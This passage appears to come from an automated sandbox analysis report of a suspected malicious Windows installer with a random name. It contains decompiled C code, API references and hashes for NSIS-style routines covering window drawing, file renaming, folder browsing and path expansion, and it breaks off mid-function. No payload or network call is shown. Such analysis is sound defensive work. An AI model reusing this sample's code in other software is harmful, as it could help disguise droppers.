                          0x004010ed
                          0x004010ef
                          0x004010ef
                          0x00401100
                          0x00401105
                          0x0040110d
                          0x00401110
                          0x00401112
                          0x00401118
                          0x0040111f
                          0x00401126
                          0x00401130
                          0x00401142
                          0x00401156
                          0x00401160
                          0x00401165
                          0x00401165
                          0x00401110
                          0x0040116e
                          0x00000000
                          0x00401178
                          0x00401010
                          0x00401013
                          0x00401015
                          0x00401019
                          0x0040101f
                          0x0040101f
                          0x00000000

                          APIs
                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                          • BeginPaint.USER32(?,?), ref: 00401047
                          • GetClientRect.USER32 ref: 0040105B
                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                          • FillRect.USER32 ref: 004010E4
                          • DeleteObject.GDI32(?), ref: 004010ED
                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                          • SetTextColor.GDI32(00000000,?), ref: 00401130
                          • SelectObject.GDI32(00000000,?), ref: 00401140
                          • DrawTextA.USER32(00000000,heifsmlbdxlebvytfzg Setup,000000FF,00000010,00000820), ref: 00401156
                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                          • DeleteObject.GDI32(?), ref: 00401165
                          • EndPaint.USER32(?,?), ref: 0040116E
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                          • String ID: F$heifsmlbdxlebvytfzg Setup$p>u
                          • API String ID: 941294808-223641062
                          • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                          • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                          • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                          • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 93%
                          			E004057D3() {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr* _t15;
                          				long _t16;
                          				intOrPtr _t18;
                          				int _t20;
                          				void* _t28;
                          				long _t29;
                          				intOrPtr* _t37;
                          				int _t43;
                          				void* _t44;
                          				long _t47;
                          				CHAR* _t49;
                          				void* _t51;
                          				void* _t53;
                          				intOrPtr* _t54;
                          				void* _t55;
                          				void* _t56;
                          
                          				_t15 = E00405DA3(1);
                          				_t49 =  *(_t55 + 0x18);
                          				if(_t15 != 0) {
                          					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
                          					if(_t20 != 0) {
                          						L16:
                          						 *0x423f30 =  *0x423f30 + 1;
                          						return _t20;
                          					}
                          				}
                          				 *0x422628 = 0x4c554e;
                          				if(_t49 == 0) {
                          					L5:
                          					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
                          					if(_t16 != 0 && _t16 <= 0x400) {
                          						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
                          						_t18 =  *0x423eb0; // 0x753e70
                          						_t56 = _t55 + 0x10;
                          						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)(_t18 + 0x128)));
                          						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
                          						_t53 = _t20;
                          						 *(_t56 + 0x14) = _t53;
                          						if(_t53 == 0xffffffff) {
                          							goto L16;
                          						}
                          						_t47 = GetFileSize(_t53, 0);
                          						_t7 = _t43 + 0xa; // 0xa
                          						_t51 = GlobalAlloc(0x40, _t47 + _t7);
                          						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
                          							L15:
                          							_t20 = CloseHandle(_t53);
                          							goto L16;
                          						} else {
                          							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
                          								_t28 = E004056D1(_t26 + 0xa, 0x409348);
                          								if(_t28 == 0) {
                          									L13:
                          									_t29 = _t47;
                          									L14:
                          									E0040571D(_t51 + _t29, 0x421ca0, _t43);
                          									SetFilePointer(_t53, 0, 0, 0);
                          									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
                          									GlobalFree(_t51);
                          									goto L15;
                          								}
                          								_t37 = _t28 + 1;
                          								_t44 = _t51 + _t47;
                          								_t54 = _t37;
                          								if(_t37 >= _t44) {
                          									L21:
                          									_t53 =  *(_t56 + 0x14);
                          									_t29 = _t37 - _t51;
                          									goto L14;
                          								} else {
                          									goto L20;
                          								}
                          								do {
                          									L20:
                          									 *((char*)(_t43 + _t54)) =  *_t54;
                          									_t54 = _t54 + 1;
                          								} while (_t54 < _t44);
                          								goto L21;
                          							}
                          							E00405A85(_t51 + _t47, "[Rename]\r\n");
                          							_t47 = _t47 + 0xa;
                          							goto L13;
                          						}
                          					}
                          				} else {
                          					CloseHandle(E0040575C(_t49, 0, 1));
                          					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
                          					if(_t16 != 0 && _t16 <= 0x400) {
                          						goto L5;
                          					}
                          				}
                          				return _t16;
                          			}






















                          0x004057d9
                          0x004057e0
                          0x004057e4
                          0x004057ed
                          0x004057f1
                          0x00405930
                          0x00405930
                          0x00000000
                          0x00405930
                          0x004057f1
                          0x004057fd
                          0x00405813
                          0x0040583b
                          0x00405846
                          0x0040584a
                          0x0040586a
                          0x0040586c
                          0x00405871
                          0x0040587b
                          0x00405888
                          0x0040588d
                          0x00405892
                          0x00405896
                          0x00000000
                          0x00000000
                          0x004058a5
                          0x004058a7
                          0x004058b4
                          0x004058b8
                          0x00405929
                          0x0040592a
                          0x00000000
                          0x004058d4
                          0x004058e1
                          0x00405946
                          0x0040594d
                          0x004058f4
                          0x004058f4
                          0x004058f6
                          0x004058ff
                          0x0040590a
                          0x0040591c
                          0x00405923
                          0x00000000
                          0x00405923
                          0x0040594f
                          0x00405950
                          0x00405955
                          0x00405957
                          0x00405964
                          0x00405964
                          0x00405968
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405959
                          0x00405959
                          0x0040595c
                          0x0040595f
                          0x00405960
                          0x00000000
                          0x00405959
                          0x004058ec
                          0x004058f1
                          0x00000000
                          0x004058f1
                          0x004058b8
                          0x00405815
                          0x00405820
                          0x00405829
                          0x0040582d
                          0x00000000
                          0x00000000
                          0x0040582d
                          0x0040593a

                          APIs
                            • Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
                            • Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
                            • Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1
                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
                          • GetShortPathNameA.KERNEL32(?,00422628,00000400), ref: 00405829
                          • GetShortPathNameA.KERNEL32(00000000,004220A0,00000400), ref: 00405846
                          • wsprintfA.USER32 ref: 00405864
                          • GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
                          • GlobalFree.KERNEL32 ref: 00405923
                          • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A
                            • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                            • Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                          • String ID: %s=%s$(&B$[Rename]$p>u
                          • API String ID: 3772915668-890395977
                          • Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                          • Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
                          • Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
                          • Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E00404275(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
                          				signed int _v8;
                          				struct HWND__* _v12;
                          				long _v16;
                          				long _v20;
                          				char _v24;
                          				long _v28;
                          				char _v32;
                          				intOrPtr _v36;
                          				long _v40;
                          				signed int _v44;
                          				CHAR* _v52;
                          				intOrPtr _v56;
                          				intOrPtr _v60;
                          				intOrPtr _v64;
                          				CHAR* _v68;
                          				void _v72;
                          				char _v76;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				intOrPtr _t81;
                          				long _t86;
                          				signed char* _t88;
                          				void* _t94;
                          				signed int _t95;
                          				signed short _t113;
                          				signed int _t117;
                          				char* _t122;
                          				intOrPtr _t124;
                          				intOrPtr* _t138;
                          				signed int* _t145;
                          				intOrPtr _t147;
                          				signed int _t148;
                          				signed int _t153;
                          				struct HWND__* _t159;
                          				CHAR* _t162;
                          				int _t163;
                          
                          				_t81 =  *0x41fc68; // 0x0
                          				_v36 = _t81;
                          				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x424000;
                          				_v8 =  *((intOrPtr*)(_t81 + 0x38));
                          				if(_a8 == 0x40b) {
                          					E0040532A(0x3fb, _t162);
                          					E00405CE3(_t162);
                          				}
                          				if(_a8 != 0x110) {
                          					L8:
                          					if(_a8 != 0x111) {
                          						L20:
                          						if(_a8 == 0x40f) {
                          							L22:
                          							_v8 = _v8 & 0x00000000;
                          							_v12 = _v12 & 0x00000000;
                          							E0040532A(0x3fb, _t162);
                          							if(E00405659(_t180, _t162) == 0) {
                          								_v8 = 1;
                          							}
                          							E00405A85(0x41f460, _t162);
                          							_t145 = 0;
                          							_t86 = E00405DA3(0);
                          							_v16 = _t86;
                          							if(_t86 == 0) {
                          								L31:
                          								E00405A85(0x41f460, _t162);
                          								_t88 = E0040560C(0x41f460);
                          								if(_t88 != _t145) {
                          									 *_t88 =  *_t88 & 0x00000000;
                          								}
                          								if(GetDiskFreeSpaceA(0x41f460,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
                          									_t153 = _a8;
                          									goto L37;
                          								} else {
                          									_t163 = 0x400;
                          									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
                          									_v12 = 1;
                          									goto L38;
                          								}
                          							} else {
                          								if(0 == 0x41f460) {
                          									L30:
                          									_t145 = 0;
                          									goto L31;
                          								} else {
                          									goto L26;
                          								}
                          								while(1) {
                          									L26:
                          									_t113 = _v16(0x41f460,  &_v44,  &_v24,  &_v32);
                          									if(_t113 != 0) {
                          										break;
                          									}
                          									if(_t145 != 0) {
                          										 *_t145 =  *_t145 & _t113;
                          									}
                          									_t145 = E004055BF(0x41f460) - 1;
                          									 *_t145 = 0x5c;
                          									if(_t145 != 0x41f460) {
                          										continue;
                          									} else {
                          										goto L30;
                          									}
                          								}
                          								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
                          								_v12 = 1;
                          								_t145 = 0;
                          								L37:
                          								_t163 = 0x400;
                          								L38:
                          								_t94 = E004046C5(5);
                          								if(_v12 != _t145 && _t153 < _t94) {
                          									_v8 = 2;
                          								}
                          								_t147 =  *0x42367c; // 0x759a19
                          								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
                          									E00404610(0x3ff, 0xfffffffb, _t94);
                          									if(_v12 == _t145) {
                          										SetDlgItemTextA(_a4, _t163, 0x41f450);
                          									} else {
                          										E00404610(_t163, 0xfffffffc, _t153);
                          									}
                          								}
                          								_t95 = _v8;
                          								 *0x423f44 = _t95;
                          								if(_t95 == _t145) {
                          									_v8 = E0040140B(7);
                          								}
                          								if(( *(_v36 + 0x14) & _t163) != 0) {
                          									_v8 = _t145;
                          								}
                          								E00403E59(0 | _v8 == _t145);
                          								if(_v8 == _t145 &&  *0x420484 == _t145) {
                          									E0040420A();
                          								}
                          								 *0x420484 = _t145;
                          								goto L53;
                          							}
                          						}
                          						_t180 = _a8 - 0x405;
                          						if(_a8 != 0x405) {
                          							goto L53;
                          						}
                          						goto L22;
                          					}
                          					_t117 = _a12 & 0x0000ffff;
                          					if(_t117 != 0x3fb) {
                          						L12:
                          						if(_t117 == 0x3e9) {
                          							_t148 = 7;
                          							memset( &_v72, 0, _t148 << 2);
                          							_v76 = _a4;
                          							_v68 = 0x420498;
                          							_v56 = E004045AA;
                          							_v52 = _t162;
                          							_v64 = E00405AA7(0x3fb, 0x420498, _t162, 0x41f868, _v8);
                          							_t122 =  &_v76;
                          							_v60 = 0x41;
                          							__imp__SHBrowseForFolderA(_t122);
                          							if(_t122 == 0) {
                          								_a8 = 0x40f;
                          							} else {
                          								__imp__CoTaskMemFree(_t122);
                          								E00405578(_t162);
                          								_t124 =  *0x423eb0; // 0x753e70
                          								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                          								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\jones\\AppData\\Local\\Temp") {
                          									E00405AA7(0x3fb, 0x420498, _t162, 0, _t125);
                          									if(lstrcmpiA(0x422e40, 0x420498) != 0) {
                          										lstrcatA(_t162, 0x422e40);
                          									}
                          								}
                          								 *0x420484 =  &(( *0x420484)[0]);
                          								SetDlgItemTextA(_a4, 0x3fb, _t162);
                          							}
                          						}
                          						goto L20;
                          					}
                          					if(_a12 >> 0x10 != 0x300) {
                          						goto L53;
                          					}
                          					_a8 = 0x40f;
                          					goto L12;
                          				} else {
                          					_t159 = _a4;
                          					_v12 = GetDlgItem(_t159, 0x3fb);
                          					if(E004055E5(_t162) != 0 && E0040560C(_t162) == 0) {
                          						E00405578(_t162);
                          					}
                          					 *0x423678 = _t159;
                          					SetWindowTextA(_v12, _t162);
                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                          					_push(1);
                          					E00403E37(_t159);
                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                          					_push(0x14);
                          					E00403E37(_t159);
                          					E00403E6C(_v12);
                          					_t138 = E00405DA3(7);
                          					if(_t138 == 0) {
                          						L53:
                          						return E00403E9E(_a8, _a12, _a16);
                          					}
                          					 *_t138(_v12, 1);
                          					goto L8;
                          				}
                          			}








































                          0x0040427b
                          0x00404282
                          0x0040428e
                          0x0040429c
                          0x004042a4
                          0x004042a8
                          0x004042ae
                          0x004042ae
                          0x004042ba
                          0x0040432e
                          0x00404335
                          0x0040440a
                          0x00404411
                          0x00404420
                          0x00404420
                          0x00404424
                          0x0040442a
                          0x00404437
                          0x00404439
                          0x00404439
                          0x00404447
                          0x0040444c
                          0x0040444f
                          0x00404456
                          0x00404459
                          0x00404490
                          0x00404492
                          0x00404498
                          0x0040449f
                          0x004044a1
                          0x004044a1
                          0x004044bd
                          0x004044f9
                          0x00000000
                          0x004044bf
                          0x004044c2
                          0x004044d6
                          0x004044d8
                          0x00000000
                          0x004044d8
                          0x0040445b
                          0x0040445f
                          0x0040448e
                          0x0040448e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00404461
                          0x00404461
                          0x0040446e
                          0x00404473
                          0x00000000
                          0x00000000
                          0x00404477
                          0x00404479
                          0x00404479
                          0x00404484
                          0x00404487
                          0x0040448c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040448c
                          0x004044e7
                          0x004044ee
                          0x004044f5
                          0x004044fc
                          0x004044fc
                          0x00404501
                          0x00404503
                          0x0040450b
                          0x00404511
                          0x00404511
                          0x00404518
                          0x00404521
                          0x0040452b
                          0x00404533
                          0x00404549
                          0x00404535
                          0x00404539
                          0x00404539
                          0x00404533
                          0x0040454e
                          0x00404553
                          0x00404558
                          0x00404561
                          0x00404561
                          0x0040456a
                          0x0040456c
                          0x0040456c
                          0x00404578
                          0x00404580
                          0x0040458a
                          0x0040458a
                          0x0040458f
                          0x00000000
                          0x0040458f
                          0x00404459
                          0x00404413
                          0x0040441a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040441a
                          0x0040433b
                          0x00404341
                          0x0040435b
                          0x00404360
                          0x0040436a
                          0x00404371
                          0x00404380
                          0x00404383
                          0x00404386
                          0x0040438d
                          0x00404395
                          0x00404398
                          0x0040439c
                          0x004043a3
                          0x004043ab
                          0x00404403
                          0x004043ad
                          0x004043ae
                          0x004043b5
                          0x004043ba
                          0x004043bf
                          0x004043c7
                          0x004043d4
                          0x004043e8
                          0x004043ec
                          0x004043ec
                          0x004043e8
                          0x004043f1
                          0x004043fc
                          0x004043fc
                          0x004043ab
                          0x00000000
                          0x00404360
                          0x0040434e
                          0x00000000
                          0x00000000
                          0x00404354
                          0x00000000
                          0x004042bc
                          0x004042bc
                          0x004042c8
                          0x004042d2
                          0x004042df
                          0x004042df
                          0x004042e5
                          0x004042ee
                          0x004042f7
                          0x004042fa
                          0x004042fd
                          0x00404305
                          0x00404308
                          0x0040430b
                          0x00404313
                          0x0040431a
                          0x00404321
                          0x00404595
                          0x004045a7
                          0x004045a7
                          0x0040432c
                          0x00000000
                          0x0040432c

                          APIs
                          • GetDlgItem.USER32 ref: 004042C1
                          • SetWindowTextA.USER32(?,?), ref: 004042EE
                          • SHBrowseForFolderA.SHELL32(?,0041F868,?), ref: 004043A3
                          • CoTaskMemFree.OLE32(00000000), ref: 004043AE
                          • lstrcmpiA.KERNEL32(xzfdi,00420498,00000000,?,?), ref: 004043E0
                          • lstrcatA.KERNEL32(?,xzfdi), ref: 004043EC
                          • SetDlgItemTextA.USER32 ref: 004043FC
                            • Part of subcall function 0040532A: GetDlgItemTextA.USER32 ref: 0040533D
                            • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                            • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                            • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                            • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                          • GetDiskFreeSpaceA.KERNEL32(0041F460,?,?,0000040F,?,0041F460,0041F460,?,00000000,0041F460,?,?,000003FB,?), ref: 004044B5
                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044D0
                          • SetDlgItemTextA.USER32 ref: 00404549
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.719266122.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000005.00000002.719245816.0000000000400000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719274597.0000000000407000.00000002.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719289522.0000000000409000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719317497.0000000000422000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719325242.0000000000429000.00000004.00020000.sdmpDownload File
                          • Associated: 00000005.00000002.719366138.000000000042C000.00000002.00020000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_400000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                          • String ID: A$C:\Users\user\AppData\Local\Temp$p>u$xzfdi
                          • API String ID: 2246997448-2661627686
                          • Opcode ID: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                          • Instruction ID: 6850db0b715ddbe2af210025c5f30c7158fed24285b7178da21f46715b177744
                          • Opcode Fuzzy Hash: 9160f627fd824642e8b844dcf08aeaa1494bcf147798ed7fcce5c5106f52e304
                          • Instruction Fuzzy Hash: BA9162B1A00218BBDF11AFA1DD85AAF77B8EF84314F10403BFB04B6291D77C9A419B59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E00405AA7(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                          				signed int _v8;
                          				struct _ITEMIDLIST* _v12;
                          				signed int _v16;
                          				signed char _v20;
                          				signed char _v24;
                          				signed int _v28;
                          				signed int _t36;
                          				CHAR* _t37;
                          				signed char _t39;
                          				signed int _t40;
                          				int _t41;
                          				char _t51;
                          				char _t52;
                          				char _t54;
                          				char _t56;
                          				void* _t64;
                          				signed int _t68;
                          				intOrPtr _t72;
                          				signed int _t73;
                          				signed char _t74;
                          				intOrPtr _t77;
                          				char _t81;
                          				void* _t83;
                          				CHAR* _t84;
                          				void* _t86;
                          				signed int _t93;
                          				signed int _t95;
                          				void* _t96;
                          
                          				_t86 = __esi;
                          				_t83 = __edi;
                          				_t64 = __ebx;
                          				_t36 = _a8;
                          				if(_t36 < 0) {
                          					_t77 =  *0x42367c; // 0x759a19
                          					_t36 =  *(_t77 - 4 + _t36 * 4);
                          				}
                          				_t72 =  *0x423ed8; // 0x7583dc
                          				_t73 = _t72 + _t36;
                          				_t37 = 0x422e40;
                          				_push(_t64);
                          				_push(_t86);
                          				_push(_t83);
                          				_t84 = 0x422e40;
                          				if(_a4 - 0x422e40 < 0x800) {
                          					_t84 = _a4;
                          					_a4 = _a4 & 0x00000000;
                          				}
                          				while(1) {
                          					_t81 =  *_t73;
                          					if(_t81 == 0) {
                          						break;
                          					}
                          					__eflags = _t84 - _t37 - 0x400;
                          					if(_t84 - _t37 >= 0x400) {
                          						break;
                          					}
                          					_t73 = _t73 + 1;
                          					__eflags = _t81 - 0xfc;
                          					_a8 = _t73;
                          					if(__eflags <= 0) {
                          						if(__eflags != 0) {
                          							 *_t84 = _t81;
                          							_t84 =  &(_t84[1]);
                          							__eflags = _t84;
                          						} else {
                          							 *_t84 =  *_t73;
                          							_t84 =  &(_t84[1]);
                          							_t73 = _t73 + 1;
                          						}
                          						continue;
                          					}
                          					_t39 =  *(_t73 + 1);
                          					_t74 =  *_t73;
                          					_a8 = _a8 + 2;
                          					_v20 = _t39;
                          					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
                          					_t68 = _t74;
                          					_t40 = _t39 | 0x00000080;
                          					__eflags = _t81 - 0xfe;
                          					_v28 = _t68;
                          					_v24 = _t74 | 0x00000080;
                          					_v16 = _t40;
                          					if(_t81 != 0xfe) {
                          						__eflags = _t81 - 0xfd;
                          						if(_t81 != 0xfd) {
                          							__eflags = _t81 - 0xff;
                          							if(_t81 == 0xff) {
                          								__eflags = (_t40 | 0xffffffff) - _t93;
                          								E00405AA7(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
                          							}
                          							L41:
                          							_t41 = lstrlenA(_t84);
                          							_t73 = _a8;
                          							_t84 =  &(_t84[_t41]);
                          							_t37 = 0x422e40;
                          							continue;
                          						}
                          						__eflags = _t93 - 0x1d;
                          						if(_t93 != 0x1d) {
                          							__eflags = (_t93 << 0xa) + 0x424000;
                          							E00405A85(_t84, (_t93 << 0xa) + 0x424000);
                          						} else {
                          							E004059E3(_t84,  *0x423ea8);
                          						}
                          						__eflags = _t93 + 0xffffffeb - 7;
                          						if(_t93 + 0xffffffeb < 7) {
                          							L32:
                          							E00405CE3(_t84);
                          						}
                          						goto L41;
                          					}
                          					_t95 = 2;
                          					_t51 = GetVersion();
                          					__eflags = _t51;
                          					if(_t51 >= 0) {
                          						L12:
                          						_v8 = 1;
                          						L13:
                          						__eflags =  *0x423f24;
                          						if( *0x423f24 != 0) {
                          							_t95 = 4;
                          						}
                          						__eflags = _t68;
                          						if(_t68 >= 0) {
                          							__eflags = _t68 - 0x25;
                          							if(_t68 != 0x25) {
                          								__eflags = _t68 - 0x24;
                          								if(_t68 == 0x24) {
                          									GetWindowsDirectoryA(_t84, 0x400);
                          									_t95 = 0;
                          								}
                          								while(1) {
                          									__eflags = _t95;
                          									if(_t95 == 0) {
                          										goto L29;
                          									}
                          									_t52 =  *0x423ea4; // 0x73951340
                          									_t95 = _t95 - 1;
                          									__eflags = _t52;
                          									if(_t52 == 0) {
                          										L25:
                          										_t54 = SHGetSpecialFolderLocation( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
                          										__eflags = _t54;
                          										if(_t54 != 0) {
                          											L27:
                          											 *_t84 =  *_t84 & 0x00000000;
                          											__eflags =  *_t84;
                          											continue;
                          										}
                          										__imp__SHGetPathFromIDListA(_v12, _t84);
                          										__imp__CoTaskMemFree(_v12);
                          										__eflags = _t54;
                          										if(_t54 != 0) {
                          											goto L29;
                          										}
                          										goto L27;
                          									}
                          									__eflags = _v8;
                          									if(_v8 == 0) {
                          										goto L25;
                          									}
                          									_t56 =  *_t52( *0x423ea8,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
                          									__eflags = _t56;
                          									if(_t56 == 0) {
                          										goto L29;
                          									}
                          									goto L25;
                          								}
                          								goto L29;
                          							}
                          							GetSystemDirectoryA(_t84, 0x400);
                          							goto L29;
                          						} else {
                          							_t71 = (_t68 & 0x0000003f) +  *0x423ed8;
                          							E0040596C(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x423ed8, _t84, _t68 & 0x00000040);
                          							__eflags =  *_t84;
                          							if( *_t84 != 0) {
                          								L30:
                          								__eflags = _v20 - 0x1a;
                          								if(_v20 == 0x1a) {
                          									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
                          								}
                          								goto L32;
                          							}
                          							E00405AA7(_t71, _t84, _t95, _t84, _v20);
                          							L29:
                          							__eflags =  *_t84;
                          							if( *_t84 == 0) {
                          								goto L32;
                          							}
                          							goto L30;
                          						}
                          					}
                          					__eflags = _t51 - 0x5a04;
                          					if(_t51 == 0x5a04) {
                          						goto L12;
                          					}
                          					__eflags = _v20 - 0x23;
                          					if(_v20 == 0x23) {
                          						goto L12;
                          					}
                          					__eflags = _v20 - 0x2e;
                          					if(_v20 == 0x2e) {
                          						goto L12;
                          					} else {
                          						_v8 = _v8 & 0x00000000;
                          						goto L13;
                          					}
                          				}
                          				 *_t84 =  *_t84 & 0x00000000;
                          				if(_a4 == 0) {
                          					return _t37;
                          				}
                          				return E00405A85(_a4, _t37);
                          			}































                          0x00405aa7
                          0x00405aa7
                          0x00405aa7
                          0x00405aad
                          0x00405ab2
                          0x00405ab4
                          0x00405ac3
                          0x00405ac3
                          0x00405ac5
                          0x00405ace
                          0x00405ad0
                          0x00405ad5
                          0x00405ad8
                          0x00405ad9
                          0x00405ae0
                          0x00405ae2
                          0x00405ae8
                          0x00405aeb
                          0x00405aeb
                          0x00405cc0
                          0x00405cc0
                          0x00405cc4
                          0x00000000
                          0x00000000
